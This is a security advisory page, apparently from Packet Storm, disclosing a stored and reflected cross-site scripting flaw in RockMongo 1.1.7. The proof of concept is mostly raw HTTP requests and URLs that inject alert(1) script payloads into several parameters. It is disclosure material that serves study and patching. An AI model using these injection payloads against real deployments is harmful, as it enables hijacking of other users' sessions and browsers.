what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

RockMongo 1.1.7 Cross Site Scripting

RockMongo 1.1.7 Cross Site Scripting
Posted May 15, 2023
Authored by Rafael Pedrero

RockMongo version 1.1.7 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | ab8d5c8051cd433bcdcc87ad984c37a9a4b0cb68d3dfa43bde20392849ab68c7

RockMongo 1.1.7 Cross Site Scripting

Change Mirror Download
# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-19
# Vendor Homepage: https://github.com/iwind/rockmongo/
# Software Link : https://github.com/iwind/rockmongo/
# Tested Version: 1.1.7
# Tested on: Windows 7 and 10

# Vulnerability Type: Stored Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: RockMongo v1.1.7, does not sufficiently encode
user-controlled inputs, resulting in a stored and reflected Cross-Site
Scripting (XSS) vulnerability via the index.php, in multiple parameter.

Proof of concept:

Stored:

POST https://localhost/mongo/index.php?action=db.newCollection&db=local
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://localhost
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0

Reflected:

https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log

https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E

https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll


POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=login.index&host=0
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3

POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.command&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json

POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.execute&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close